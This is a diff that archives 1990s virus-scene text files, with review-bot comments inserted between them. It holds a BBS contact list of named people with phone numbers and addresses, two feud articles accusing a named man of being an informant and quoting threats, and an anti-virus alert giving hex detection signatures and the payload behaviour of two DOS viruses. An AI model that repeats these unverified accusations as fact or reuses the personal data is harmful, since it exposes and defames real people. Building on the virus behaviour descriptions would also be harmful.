VIRNET (9:310/15) (2:281/618) ++31-1621-17804 The Fly BBS, Nederland VIRINF (2:285/213) ++31-1899-19989 Albert Louw, Holland VNT (9:310/1) (2:285/521) ++31-20-6391620 BULLET VNT (9:314/206) ++31-20-6962860 PCN, Amsterdam NL (2:280/415) ++31-2159-36349 Dirk-Jan's BBS, Bussum NL (2:500/289) ++31-23-316333 HCC Kennemerland, Haarlem NL (2:500/45) ++31-2998-3603 Bamestra RBBS, Beemster NL (2:512/10) ++31-30-440955 FLASH BBS, Utrecht NL VIR (2:512/43) ++31-3200-48835 Virus Rescue BBS, Lelystad NL (2:282/401) ++31-3402-41167 Bitbull BBS, Nieuwegein NL (2:512/153) ++31-3408-70908 BBS IJsselstein VIRINF (2:512/142) ++31-45-275101 HCC Olivetti GG Heerlen, Brunssum (2:500/120) ++31-4927-65271 Googol Board VNT (9:313/0) ++31-4998-97759 Def Board Multi Line Palace Best NL (2:284/202) ++31-53-303902 KIM Gebruikersclub Nederland (KGN) - /328506 (2:512/32) ++31-53-310897 UtilSoft BBS VIRINF (2:283/326) ++31-53-328506 KIM Gebruikersclub Nederland (KGN) - /303902 (2:512/32) ++31-53-770281 Big Hole, Enschede NL (2:283/303) ++31-53-773628 Big Hole, Enschede NL (2:283/303) ++31-55-431332 Discovery BBS, Apeldoorn NL (2:500/249) ++31-58-670887 Coosjer-BBS, Leeuwarden NL (9:314/13) ++31-58-675911 The Experience, Leeuwarden NL VIR (2:282/360) ++31-5976-2020 Odin Never On Line, Blijham NL VIRINF (2:512/58.3) ++31-70-3898822 Support BBS for PC Vaccine Professional ++31-70-3898822 Infodesk, F Hagelaars, The Hague NL VIRINF VIR (2:512/2) ++31-70-3898822 Infodesk, Frans Hagelaars, The Hague NL (2:2801/1007) ++31-73-569797 The Gauntlet (2:512/37) ++31-77-870559 De Werkplaats, Venlo NL (2:500/255) ++31-78-176468 Da Vinci, Dordrecht NL (2:285/308) ++31-8389-15331 BBS Bennekom VIR (2:283/203.0) ++31-85-212395 Thunderbyte Help, Arnhem NL (2:280/200) ++32-11-568620 Luc Shoofs, Belgium VNT (9:321/101) (2:296/10) ++32-14-312818 Info-Center BBS VIR (2:292/401) ++32-14-656289 Lions & Pittaway, Belgium VIRINF (2:292/405) ++32-14-658726 Lions & Pittaway, Belgium VIRINF (gone 930601)(2:292/405) 
++32-15-520279 The Cormoran BBS, Hever (2:292/500) ++32-2-4606546 RTV-SAT BBS, Belgium (2:291/709.108) ++32-63-219642 FBH System VIR (2:293/2601) ++32-71-402677 The NoNamE BbS Chatelineau Belgique VIRINF (2:293/2003.1) ++33-1-42060305 Logidata International S.A. France TBAV agent ++33-1-43074097 Li'LL BBS, Paris FR VIR (2:320/7) ++33-20392225 E Vandermeersch, France VNT (9:331/101) (2:322/2) ++33-39-529854 CAD Connection, Montesson FR (2:320/203) ++33-84-268606 A.C.M.E. BBS, Belfort FR VIR (2:325/1) ++34-58-123848 Alfredo Sanchez, Spain VNT (9:341/101) (2:345/801) ++351-1-3526426 Justin Solvsten, Portugal VNT (9:3511/101) (2:362/3) ++351-1-8869095 Kaos BBS, Lisbon, Portugal (2:362/21) ++351-34-382467 Inforlandia, Aveiro (2:361/4) ++353-1-2831908 Stephen Kearon, Ireland VNT (9:3531/101) (2:263/167) ++353-1-711047 TOPPSI, Dublin Ireland (2:263/151.0) ++353-1-773547 TOPPSI, Dublin Ireland (2:263/151.0) ++353-51-83771 Reflex AV-BBS VIR (9:3532/0) (2:263/401) ++354-2-14626 Vision Bulletin Board System VIR (2:391/20) ++358-0-4551011 IntroPoli, Finland (2:220/91.59) ++358-0-735316 SL, Helsinki Finland (2:220/456) ++358-0-735316 K Ylhavuori, Helsinki Finland VNT (9:3581/104) (2:220/456) ++359-2-650057 Hristo Mitov, Bulgaria VNT (9:3591/101) (2:359/108) ++359-2-737484 Lab of Computer Virology, A Sharlandjiev, Bulg.(2:359/110) ++359-52-451561 Navigator Gate, Varna Bulgaria VIRINF (2:359/10) ++36-1-1154402 VirNET, Janos Kiss, Budapest (2:371/9) ++36-52-49662 LifeForce (18-06h), Hungary VIRINF (9:361/103) ++36-56-372189 Erno Petro, Hungary VNT (9:361/101) (2:370/1) ++36-56-422189 Erno Petro, Hungary VNT VIRINF (9:361/101) (2:370/1) ++39-40-3783111 Fido, Trieste (2:333/603) ++39-45-568713 The Axis, Verona (2:333/103) ++39-523-896512 Rodolfo Vardelli, Italy VNT (9:391/101) (2:331/206) ++39-6-5411061 Power of KnowLedge, G Finocchiaro MC2464@mclink.it ++39-766-540899 Virus Help HQ, Civitavecchia (2:335/5) ++39-81-5453744 The World BBS, Napoli Italy (2:335/4) ++39-81-7701852 Gold 
BBS, Napoli Italy VNT (9:395/108) (2:335/220) ++39-95-501010 Catania Uno, Catania (2:335/503) ++41-1-2730122 R Schmidiger, Switzerland VNT (9:412/101) (2:300/801) ++41-61-3210379 YaCaN-BBS VNT (9:412/410) ++42-5-749889 CSFR, Pavel Mrnustik VNT (9:421/101) (2:241/24) ++43-2216-2153 F De Cassan, Austria VNT (9:432/102) (2:313/14) ++43-2252-764590 Watchdog's BBS, Sooss A (2:313/100) ++44-21-7881754 Faint Breeze, Birmingham UK (2:253/164) ++44-222-707359 Black Cat BBS VIR (2:251/27) ++44-224-827166 Blue Label BBS, Aberdeen UK (2:259/22) ++44-241-2793 Glasterlaw BBS, Arbroath UK (2:259/24) ++44-244-550332 Peter Duffield AM/MC/PC CVP/RVW CVC VIRUS-L (2:250/201) Vrms ++44-244-550332 N.Wales pd@nwavbbs.demon.co.uk VNT (9:441/110) (2:250/201) Vrms ++44-244-827166 Blue Label BBS VIR (2:259/22.0) ++44-273-509152 Spartacus, Brighton (2:441/27) ++44-273-688888 Six & Five 8's (2:441/86.0) ++44-273-699999 Six & Five 8's (2:441/86.0) ++44-282-850011 Random Access, Barnoldswick UK VIR (2:256/38) ++44-342-717800 Airtel Remote Access VIR (2:440/64.0) ++44-392-433566 NCSA, B Sterrett, Exeter UK VNT (9:441/101) (2:255/34) ++44-41-8807845 Alba Maximus, Glasgow/Barrhead (2:259/2) ++44-494-724946 S&S International Dr. Solomon's Anti-Virus Toolkit ??? ++44-506-440582 Wally's BBS, Livingston Scotland (2:259/27) ++44-533-700368 Formal Dress Not Essential VIR (2:253/161) ++44-536-414103 The Pegasus Connection, Kettering VIR (2:258/28) ++44-602-855607 Index III, Nottingham UK VIR (2:250/413.0) ++44-602-855661 Index III, Nottingham UK VIR (2:250/413.0) ++44-61-4426758 Seven Seas, Stockport VIR (2:253/410) ++44-61-7072008 DOA/UK's Number 1 AntiVirus BBS, Manchester (2:250/110) ??? 
++44-61-7961770 The Cavern BBS, Manchester UK VIR (2:250/102.0) ++44-695-31439 Byteseyes BBS, Skelmersdale UK (2:440/507) ++44-705-511590 GABBS, Gosport (2:251/16) ++44-706-376624 Teenage Retreat, Littleborough (2:258/16) ++44-734-320812 Golly!, Twyford (2:252/21) ++44-737-766027 Infotel, Redhill UK (2:252/206) ++44-738-52063 Guru-Ten BBS, Perth UK (2:259/6) ++44-793-432955 Intel Corporation LANProtect ++44-81-3904701 Pyrotechnix BBS VIR (2:440/38.0) ++44-81-3955096 Test Drive BBS (2:254/40) ++44-81-4478244 The Crystal Tower, Enfield UK (2:440/25) ++44-81-7470749 Tornado BBS, London UK (2:440/114) ++44-843-852495 Amiga World BBS, Kent UK VIR (2:440/115) ++44-862-88340 Raytech BBS VIR (2:259/49) ++44-895-270762 FreeMatrix BBS VIR (2:254/39) ++44-933-401101 Cat Flap BBS, Wellingborough (2:258/27) ++45-31427264 AMC International & RA Support, Copenhagen DK (2:231/50) ++45-42-367481 Dan.Crypt.Cen.Roskilde Kjell Olsen(9:451/170)(2:234/79.15) ++45-45-875316 Frog BBS, Lyngby (2:230/151) ++45-53-847074 Horreby SuperBBS VNT (9:451/169) (2:230/512) ++45-86936822 Thomas Schmidt, Denmark VNT (9:451/101) (2:230/74) ++46-26275710 Virus Help Ctr #1, M Larsson VNT (9:461/101)(2:205/204) ++46-26275715 Virus Help Ctr #2 vhc@abacus.hgs.se (9:461/101)(2:205/234) ++46-36-121323 NewAge BBS, Jnkping Sweden VNT (9:9/1) (2:204/503) ++46-431-70909 Buller BBS, Bastad (2:200/221) ++46-620-12955 NKAB Sweden TBAV agent ++46-620-13709 NKAB Sweden TBAV agent ++46-620-13796 NKAB Sweden TBAV agent ++46-620-17154 NKAB Sweden TBAV agent ++46-8-59088689 LusseBurken Stckhlm (9:462/111 or 136 2:201/269 2:201/262) ++46-8-7602615 Dr Solomon's Anti-Virus Toolkit ++46-8-7602615 Tel +46-8-7602600 Fax +46-8-7602605 (2:201/370) ++46-8-7602615 micke.l@qainfo.se 100135,1742@Compuserve.com (2:201/370) ++46-8-7602615 PO Box 596 S-175 26 Jarfalla Sweden (2:201/370) ++46-8-7602615 Micke Larsson, QA Informatik AB (2:201/370) ++46-8-7609162 Lost Toy BBS VIR (2:201/236.4) ++46-90-149205 Back To Business Base BBS VNT 
(9:466/200) ++46-910-52214 Artic BBS CSC #1, Skelleftea (2:205/422) ++48-22-315889 Akme BBS, Warszawa [Warsaw Poland] (2:480/21) ++49-202-305803 Justin Mann, Germany VNT (9:491/1000) (2:241/5601) ++49-203-750511 Duisburg Germany Shuttle VNT (9:493/1190) (2:2401/111) ++49-211-671635 Local Service, Duesseldorf VIR (2:241/4158) ++49-2196-95289 B.L.M., Wermelskirchen (2:2402/61) ++49-221-737134 Gayline, Cologne Germany VNT (9:491/4090) (2:2402/109) ++49-2309-77019 WayForward, Tobias Burchhardt VNT (9:492/6050) (2:245/39) ++49-2330-13353 Stones, Herdecke (2:245/5804) ++49-2331-64435 WildCat Hagen VNT (9:495/0) (2:248/25) ++49-2331-67555 WildCat Hagen VNT (9:495/0) (2:248/210) ++49-2824-16212 Kalkar BBS, Kalkar (2:2401/209) ++49-5252-973212 Urmel's Eis, Bad Lippspringe (2:242/55) ++49-531-681034 Download Paradise VNT (9:491/6000) (2:240/500) ++49-5373-2706 Mail Storage, Hillerse Germany VNT (9:491/6030)(2:240/520) ++49-6202-270420 News-box, Schwetzingen VNT (9:492/3560) ++49-6301-3622 The Database Warehouse, Kaiserslautern (2:247/110) ++49-6331-63207 Neuenfels - Box Pirmasens VNT (9:492/2570.0) (2:247/122) ++49-6422-7878 Golem, Kirchhain 1 (2:248/102) ++49-6898-76119 Super Mario Mailbox VIR (2:242/516) ++49-69-539806 The Summit BBS VIR (2:247/406) ++49-69-833076 Gilbert's Fundgrube - Offenbach/Main FRG (9:494/7060) ++49-721-370297 Virus Research Center Line II (2:241/7526) ++49-721-821355 Virus Help Service, Karlsruhe(Nemesis author) (2:241/7518) ++49-7541-74623 Bodensee bitbeisser Crew Friedrichshafen (2:241/7207) ++49-89-7005659 Advabced, A Schweigart, Munich VNT (9:494/3120)(2:246/119) ++49-89-8131695 Beta-System, Muenchen (2:246/10) ++49-9334-8175 Ed's BBS, Sulzdorf FRG (2:246/86) ++49-951-34659 Another Brick In The Wall! 
VIRINF (2:2400/304) ++52-83-564119 Creaturas de la Noche, Monterrey NL (4:971/1) ++61-2-4821716 Calmer Software TBSCAN/TBRESCUE/TBSCANX/Thunderbyte Card ++61-3-8885932 Melbourne Board: ComputerWare for Micros (3:681/871) ++61-7-2000660 Diagnostic BBS, Brisbane, Australia VIRINF (3:640/302) ++61-7-3991322 Power Up OZ VIRINF (3:640/215) ++61-7-8861886 The Edge of Reality! VIR C:CURE (3:640/886) ++66-2-2555981 Bangkok Security Associates Victor Charlie ++7-044-2689168 Fil Grushevsky, Ukraine VNT (9:744/101) (2:463/34) ++7-08535-98301 grdo@grdo.botik.yaroslavl.su, Pereslavl DOGSoft Ambulance ++81-3-36579255 The Watering Hole BBS, Tokyo VIRINF (6:730/18.0) ++852-789-1267 TAIC, gu_jc3@stu.ust.hk, Hong Kong (6:700/1) ++886-2-304-8901 Zen BBS, Taiwan VIR (6:720/312.0) ++886-7-5321444 Power Wave VIRINF (6:727/19) ++886-7-741-8038 New Taiwan Opus BBS VIR (6:727/2.0) ++90-1-2617628 RAN BBS, Istanbul Turkiye VIR (2:430/12) ++972-3-5490985 Wild Gun Excell/\/et VIRINF (2:403/156) ++972-3-9667562 Nemrod Kedem Rishon Le, Zion Israel (2:403/138) ++972-3-9673256 2400 MNP5 VNT (9:9721/0, 9:99/972) (2:403/138) ++972-3-9673499 14,400 V32b/V42b VNT (9:9721/101, 9:972/0) (2:403/138) ++972-3-9673919 14,400 V32b/V42b PC MC AT AM VIR (2:403/138) ++972-3-9674326 2400 V42b (2:403/138) ++972-3-9674339 Rudy's Place, Zion Israel (2:403/138) ++972-52-27271 Atari Blues BBS Israel (2:405/101.0) ++972-7-762291 Time Vortex VNT (9:9721/111) ++972-8-476549 Triple D BBS, Rehovot Israel (2:403/123) + +============== +Vancouver ROBERTS@decus.ca | "It says 'Hit any +Institute for Robert_Slade@sfu.ca | key to continue.' +Research into rslade@cue.bc.ca | I can't find the +User p1@CyberStore.ca | 'Any' key on my +Security Canada V7K 2G6 | keyboard." diff --git a/textfiles.com/virus/cnws2006.vir b/textfiles.com/virus/cnws2006.vir new file mode 100644 index 00000000..54e839d7 --- /dev/null +++ b/textfiles.com/virus/cnws2006.vir 
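Review bot: non-ASCII characters were dropped rather than transcoded when this list was converted, so `++46-36-121323 NewAge BBS, Jnkping Sweden` has lost the letters of Jönköping; the source was almost certainly CP437, and decoding it as such (or keeping the raw bytes) would preserve the place names. Two consistency points worth recording in the commit message rather than fixing in a verbatim mirror: the Blue Label BBS entry appears under both `++44-224-827166` and `++44-244-827166` with the same FidoNet address 2:259/22, so one dialling code is a transcription error in the original, and the five `++46-8-7602615` lines are a single organisation's phone/fax/e-mail/postal block split across numbered entries. Because the file lists individuals' names with their phone numbers, e-mail addresses and a postal address as of 1993, a provenance line stating that it is an unedited historical document and not a current contact directory belongs in the README.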
@@ -0,0 +1,149 @@ + + [ Echoes of Conspiracy ] + + By FireCracker + + + + + You have no idea how many times this week I have been asked "Is John +Buchanon a narc?" Well I cannot really say honestly yes or no to anyone who +has asked this question. The only thing I can offer the readers & friends is +the opportunity to see for themselves all the information and let each and +everyone decide for themselves what is truth and what is false. + + + +Round One: +---------- + + I have known Aristotle AKA John Buchanon for about 2 years now. I was +very much taken in by his social engineering skills and did not realize how +much he liked to have control over someone until he had backstabbed some of my +friends. In the beginning when I first started to talk to"Aristotle"(On my +dime!), my head was filled with "Do you know this person?..Well he/she is a +av'er and this person and this person and this person..etc etc etc" I stopped +calling him on a regular basis after I got tired of the political crap that +he kept on insisting on trying to drill in my head. I started talking to +him again in the summer of 93'. At this time period John was the NuKENET +USA HQ. Funny though I have never seen a HUB on a network have to have the +Network Moderator (RockSteady) poll him because he could not call out. +Our time on the phone was no differnt than before. He was a little upset +that NuKE had not done anything since VCL besides info journals. He wanted to +know if I wanted to help him start a group. I said sure why not. He said lets +use the name NuKE. I said huhu John that name is like taken remember. He said + "Who cares.. lets do it anyway" I said naww I think I' ll pass dude. I started +to think about this. Around this time period I had not received any mail from +the NuKENET in 23 DAYS! So I called John and asked him what was up.. 
Answers I got +were "..Not much going on the net right now" or "..Must be something wrong +between you and the bbs you are polling" So I called Rock Steady up and said +"SOMETHING AN'T RIGHT!, I want to poll the WHQ (Cybernetic Violence)" and +within an hour I was polling getting about 350k of messages I never had seen +come across the net. I called the board (one of Johns guru's) I was getting +feed from and told the sysop not to pack mail for me..I was getting it straight +from Canada. John called me within an hour of this and was extremly pissed, +and said that I was walking on his feet and screwing all his plans up. " I said +what plans are these John?" He told me that " I am going to kick Canada and +overseas out of the net and take it over." So I basically told him to get a +life and to screw off, which he did not like. I receieved alot of calls on my +voice number, after this, from Aristotle pawns like : + +Gene Paris AKA Jesus Slut Fucker ; Tells me he was going set my name up in the +National Crime Computer as being wanted for child molestation and he would +be laughing at me in jail. I am surprised that John actually associated him +self with someone who was a cocaine addict, was running around texas crash +bbs and made this a requirement to join his little terrorist group. Rumors +have pointed me as the indiviual who turned Gene in but this is an untruth. +Gene, like an idiot, tried to upload a virus to the NCC and received a phone +call after he got done that said, "We got you" and that was the end of Gene. +Question on my mind, did someone urge him on and then set him up? +Have fun in jail moron! + +A "Hacker" ; who tells me he has hacked Johns bbs and got my voice number from +John's "pretend" net where he had supposedly posted it. I still do not +know what the purpose of this call was. Who was this that called me John? + +Jackel ; This guy is TKO'ed no need to go in great details here! 
+ +Round Two : +----------- + + In April of 1993, A friend of mine was calling differnt H/P/C/V/T/A/R/G/... + bbs's looking for viruses and came across some board that was into credit card +exchange. He looked around a bit and consequently saw his brothers credit info +posted up on this bbs. He asked the sysop to remove it and was told to FUCK OFF +. My friend said ok let's dance mr. sysop and called the United States Secret +Service about this bbs. There was supposed to be a meeting the following day. +He told his parents, myself, and John. Around 10:00 the day of the meeting, +my friend called me to tell me the Secret Service called his voice mail box and +left a message that said "We heard you told some people about our meeting and +we find this unacceptable, therefore we are cancelling our meeting" We were not +sure of the reason and knew who said something but did not know why. A year +later Aristotle told my friend that he was the one who called the secret +service because he wanted to "protect" him from anything bad happening to him. +When confronting Aristotle about this I was asked where did I receive this info +from, I refused to tell him but I did say that I was told about this incident +from two different parties. My question is still unanswered as of today. What +where you protecting him from John? + +Round Three: +------------ + +John and myself locked horns again in late March (1994). A fellow NuKE memeber +called and let me in on some real sweet information about Aristotle and the fact +that he might be an informant of some kind. John knew that something was up +and got on the horn with just about all of us to tell us that this information +should not be published. I probably spent about 5 hours total listening to +John explain that there were alot of crazy people in the world and that this +information might lead someone into think he was an informant/narc/whatever +and that they might come and hurt his family. 
I tried to explain to John that +the same thing had happen to me at the hands of one of his Disciples (Jackel) by him +realeasing "The HopperMainna Files" out on warez nets telling individuals I had +busted his Cousin Paris for phreaking and this is the number they should call to +fuck with me at work. I told John that all these WaReZ guru's had my info and +were told I was a narc but nothing happened, except everyone got a kick out of +listening to all mighty jackel talk on a speaker phone at work. I found that +trying to show John the close relationship with my example and his only +encouraged more screaming in my ear! I read over the information I received and +it is quite interesting and I really wish I could share it with you here but it +is not my information to share and I am sure when the owner wants it to be +released he will do so. + + +The lastest info +~~~~~~~~~~~~~~~~ + Well, I have to disagree with Screaming Radish in the fact that I do not +think he is on the top of John's shit list anymore because of a incident that +happened in early April. It seems that he is extremly pissed at the fact that +someone followed his butt to work one day and did some checking in on the every +day life of aristotle. He finally saw what it was like when someone pulled the +same info gathering childish shit on him. I was told on the phone by John +that he was going to come to my work and grab me from behind my desk and stomp +every fucking tooth out of my mouth. Unknownly at the time I was recording this +whole thing. I told John that the only reason that it was done to him was to +prove a harmless point that it is not fun when the tables are turned. + +So to answer the question... Is John a Fed? I would say no he is not a true fed +but someone who is looking for a goverment job and may leak information to +friends to try and boost his chances at an oppertunity. + + "So what FC, does it matter if John is turning in hackers? 
Do you say that you + are in support of the activity of people doing evil and mischevious things with +computers, telecommunications, credit, and electronic tresspassing?" + + ..No I am not one who condones this stuff nor do I think it is my duty to run +around cyberspace playing cybercop hunting down the mean and evil hackers of the +world. If people are doing something wrong they will get them ownselves in +trouble, unless they are good.. I do have a problem though with someone +running around playing cybernarc, setting people up, erging young minds on, then +turn around and report thier actions to thier local Sercret Service office. +Which I do believe to be the case here. I think Johns biggest problem is that +he was diagnosed with a learning disabilty at a post teen age and has strong +Narsassic tendancies with the erge to share it with us all. + + The next article you should read is one that was written by Mike Paris +[C.R.I.S.]. I found it to be very informative and answered some of the +unanswered question I had. + + FireCracker , [N u K E] + \ No newline at end of file diff --git a/textfiles.com/virus/cnws2007.vir b/textfiles.com/virus/cnws2007.vir new file mode 100644 index 00000000..bafadac4 --- /dev/null +++ b/textfiles.com/virus/cnws2007.vir 
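Review bot: this file ends with `\ No newline at end of file` while the other files in the commit end with a newline; for a mirror that is acceptable, but the commit message should say whether trailing-newline differences reflect the originals or the import tooling, since whitespace-normalising hooks would otherwise change this file silently. The larger documentation gap is that the text is a first-person accusation naming real people as informants and recounts threats and doxxing (`Tells me he was going set my name up in the National Crime Computer`, `telling individuals I had busted his Cousin Paris`); nothing in the file or commit marks it as an unverified personal account from a virus-scene newsletter of around 1994, and a provenance note would help anyone citing it.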
@@ -0,0 +1,195 @@ + The Facts About Aristotle And His Friends + + Things I have Seen and heard + and + The things He Told Me. + + By: Michael Paris C.R.I.S + +First of all I do not agree in putting people down or slamming on +them. This information is not written as such, it is just to serve +those out there that want to know the facts and happenings in the +last year between C.R.I.S, Michael Paris, his friends and +Aristotle. + +First some simple facts about him. John and I at one time were +pretty close. I spent thousands of dollars on phone calls to him, +on an average I would say we used to talk at least every day for +about six months and as the bills were getting worse at least a +couple times a week. John always had his ideas and plans and a big +ego to go with them. If you are talking to him now you will +understand what I say quite well. + +He makes bold statements all the time and he makes it so you have +to agree with him. Everything he says is Gospel and you have to +agree with him or get a headache. I will go into some of these +claims later in this letter. If you know him or talk to him I urge +you to consider the contents of this information and pull out (just +disappear) while you can. + +You might say to your self that you know he is full of shit but you +are having fun right now, and you are in control. Do not be +deceived! Once he gets his claws into you it is hard to get away. +It is like joining a cult. It seems to me to be a slow brain +washing process. Be careful! + +Aristotle's Claims to C.R.I.S +------------------------------ + +When Cris first began to form and take shape we met John and began +to receive the NuKE echo's through him. We thought he was a cool +guy and invited him to join. It was not long before we saw that he +wanted to take Cris over, he started coming up with ideas and +dictating to us what we were going to do. 
This did not last very +long, but the fact is there that we stopped in our tracks and came +to reality of the direction we wanted to take. + +John still in the background tried his best to get other people +into 'his' little Cris group that he started naming "institutes of +virus research". We wanted no part of this or him at this time. +Our last talk on the topic was "where is the research" John had no +plans of research, it was just a name or title to get him farther +in his games, he never wanted to be legit in what he was doing. + +Now I have heard that he has told people that he started the group +Cris and I stole it from him! If you believe this you have a way +to come :) Do you think John would let anyone steal anything from +him? + +Everything good has to originate with him! He is the master, the +creator of all good things, but if you know him you know what I +mean. + +JOHN'S WILD CLAIMS +------------------- +Did you know John started Nuke? Nuke is his group, all in Nuke +follow him! NukeNet belongs to John as well. I got netmail and a +voice call from Nowhere Man telling me Him and Rock Steady wanted +me to cut people from the net. Well John was the "Boss" so I +called him to ask what to do. He said "Fuck Nowhere Man" "this is +my net" "who the fuck do they think they are?" "I'm Kicking there +asses out of the net" "don't listen to them" I just cut their +feed to the net, now lets see what they will do" Now I know where +he got the idea he started Cris :) + +Did you know that ALL viruses get uploaded to John (FIRST) before +any other VX board will get them John already had them. Did you +know that ALL the viruses out there on the other VX boards are from +John and that if it was not for him they would not have them? + +Did you know that John knows (everyone) that is somebody? (Both AV +and VX) + +Did you know that John is ahead of everyone? 
(smartest guy in the +world) + +Did you know that he knows ALL that is going on in (EVERY) group +and ALL info comes to him first? + +JOHN AND THE FEDS +----------------- + +Life was nice without talking to him for a while, how long could +this last? Not long at all. There was a friend of a friend down +here a while ago that I got a call on. The call was simple and +sweet, Tell him to stop what he is doing, or he is going to get +busted. I called his friend and his friend called him to warn him. + +Next comes a call from John. (Mr. Fed) Who gave you this info! +Someone's going to hang! "I will find out who leaked this +information!" "I will call the head of AT&T security and heads +will roll" "We will find out who did this" "It had to be someone +internal with connections". + +Why was John so upset with this? Well it turns out that this guy +was being used by both John and another (Known) Federal Agent to +get people connected to 800 conferences and get in good with them. +Funny thing was that John told me he was upset with Nuke and taking +it over because of their Nuke-Info #7, and all of the H/P/A stuff +in there, and now he has this kid calling me and two-waying the +call illegally so he does not have to pay for the call. + +I told him NEVER to call me in such a way again. I have a wife and +children, I do not need stuff like this coming back to me! + +From talking to this guy I find out that he is Phreaking all over +the country for John and his FED friend! I asked him if he was +crazy or what! The next thing you see is this guy organizing 800 +conferences getting very well known Phreakers on the line with John +and his FED friends. We figure that John was using him to get to +the others and make friends with them and get them busted. + +John told me that he hated people that were phreakers, why else +would he do it? And then John calls and is real mad that now he +wants to stop (because we warned him), Why? We helped ruin his +plans! 
+ +ARSTOTLES BBS - A FED BOARD? +---------------------------- + +This is on tape + +Now we come to the time John took his board down and finally got a +job. But what kind of job? Ask him, I was real friendly with him +one day and he told me :) + +First John needed to get a security clearance for the job he has +now with the federal government. He ran into some problems with +this because he had dealings with some neo-nazi organization in +germany. (he sold the head of this organization his virus +collection) The feds had an investigation on this, they told John +that this was an international offence. it could be termed as +espionage. Selling weapons to the enemy. + +Could this be why his board is now according to John "sanctioned"? + +Yes John took his BBS down for about two weeks and then put it back +up again. He told me he would never put it back up, then he told +me that he told the feds that he took it down for good and would +not get back into viruses or BBS's or the like. Then John said +that they told him to put it back up. + +John told me that I was doing it all wrong, Here at Cris we tell +people where we are coming from, We are AVVX, John says, "you are +not going to get any more uploads" "you would not believe the stuff +I am into" "I am working with (AV persons name removed)" "we are +working on a government scanner" Yes John told me that he is in +constant meetings with AV/Government people and that his board is +sanctioned by the US Government, He told me that all of his info +and viruses are given over to them. + +JOHN / HOW CAN YOU TRUST HIM? +----------------------------- + +Not long ago there was someone that John was talking to, She was in +Virnet and passing Virnet and AV info to John. She never got +anything in return, she was just trying to be friends and help John +out. She bought his collection and even made friends with John's +wife. Then one day John decided he did not need her anymore so +what did he do? 
He called the head of this net and told on her, I +know this for a fact! John told me so. Also she ended up loosing +her job with a government company because (she said) John called he +work and told on her. Through their whole relationship she was +worried and asked John not to tell people who she was or what she +did. John promised never to tell anyone. + +John Gave me phone numbers and files that were never supposed to +get out. John gave me info one night (names, addresses, phone +numbers, etc on all that bought his collection and that were on his +bbs). He gave me Nuke members home personal phone numbers. + +John is now releasing personal info on all that he is mad at. + +The point here is are you going to be next? You keep feeding John +info on everyone he asks you to, and in between the breaths he is +writing down your info, taking screen captures, etc .. waiting for +the day he decides you are of no use any more. Or maybe he will get +you busted when he is through with you. Do not be deceived! This +is one dangerous man! + + +Watch You ASS! + +Michael Paris (C.R.I.S) + + diff --git a/textfiles.com/virus/cnws2008.vir b/textfiles.com/virus/cnws2008.vir new file mode 100644 index 00000000..6e760e04 --- /dev/null +++ b/textfiles.com/virus/cnws2008.vir 
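Review bot: the file ends with two empty `+` lines and its heading `ARSTOTLES BBS - A FED BOARD?` misspells the name used everywhere else; both belong to the original and should stay, so the archive directory should be excluded from any trailing-whitespace or spell-check hooks the repository adds later. The security-relevant content is the account of an operator collecting members' identifying data (`names, addresses, phone numbers, etc on all that bought his collection`, screen captures) and releasing it once they were no longer useful, which is the data-retention risk of sharing identity with any intermediary; the author presents it as hearsay (`This is on tape`, `John told me so`), and the commit should not describe it as established fact.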
@@ -0,0 +1,2116 @@ +-----BEGIN PGP SIGNED MESSAGE----- + + +For Complete Up Dated Sigfiles for TBAV or SCAN +Freq Magic Names CRISTBAV or CRISMCAF from 1:115/863 + +CRIS Virus Signature Alert! + +- ---------------------------------------------------------------------------- +Virus Name: South African Peace Virus + Notes: COM EXE INF + Signature: 5E 81 EE 06 01 E9 03 01 43 4F 4D 4D 41 4E + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.09 : probably infected by an unknown virus + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. + +This is a direct overwriting file infector of .COM files to include +Command.com. Infected files will not longer run but you will get a +message on the screen. On 5 December of any year, it will attempt to +do two things. For systems using Dos 5.0+, it will turnoff access to +the C: drive. It will also attempt to delete a file called "chklist.ms" +in the current directory an infected file is run from. Cleanup is +simply replacing the infected files. Also, on 5 Dec, if the infected +file is run and the time in seconds is greater than 30, you will get +another message. Other than the one the original infection or infected +files gives. + +Bill Dirks + +Note: Infected files will be changed by 484 bytes, after all files +are infected the virus will write to itself now 777 bytes. The message +that will be displayed on the screen is "Let's Have Peace in S.A. From +OL' Jim Blue". The second message will get cut in the middle and not be +fully displayed. Infected files dates are changed to 00-17-90 + +Michael Paris + +- ---------------------------------------------------------------------------- +Virus Name: K-CMOS (Crypt Virus) + Notes: COM EXE INF + Signature: (TBAV) B9 CC 01 BB ?2 2E 81 07 ?2 83 C3 02 + (FPROT) B9 CC 01 BB ?? ?? 2E 81 07 ?? ?? 
83 C3 02 + (SCAN) "B9CC01BB??2E8107??83C302" [K-CMOS] + +Virus Name: K-CMOS (first generation) + Notes: COM EXE DROP + Signature: BE 0D 01 2E 8A 84 94 03 2E 8C 84 B1 03 50 + + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.09 : probably infected (infected files are missed) + SCAN V109 : No viruses found. (infected files see TridenT) + +If you add the above signature to your scanner, it will be detected. + +This virus will infect .EXE & .COM files. It will zero out +the stored drive values in CMOS on AT+ machines. However, it is a +little picky. Depending up on OS utilities loaded, it may cause an +immediate coldboot after zeroing the CMOS but failing to infect files. +Because the CMOS values are zeroed for the drive type, upon reboot, +it will look like no drive is present. This virus will attempt to walk +directories using the Path set in the environment to help determine +which files to infect. If you are in a directory not in the path +statement, it seems to foil it because I couldn't get it out of the +current directory. It looks at the timer only to get a random word for +use by the file/virus encryption routine. The timer isn't used for a +payload. This routine is fairly static and the virus can be found with +one wildcard string. As a marker to determine infected files, it sets +the seconds to 58 in the file date/time stamp. + +Bill Dirks + +Note: Infected files change in size 937 bytes. Each time an infected file +is run it will infect one .EXE and one .COM file in the current directory. +If it finds that there are no clean files to infect it will attempt to +infect files in other drives and directorys. 
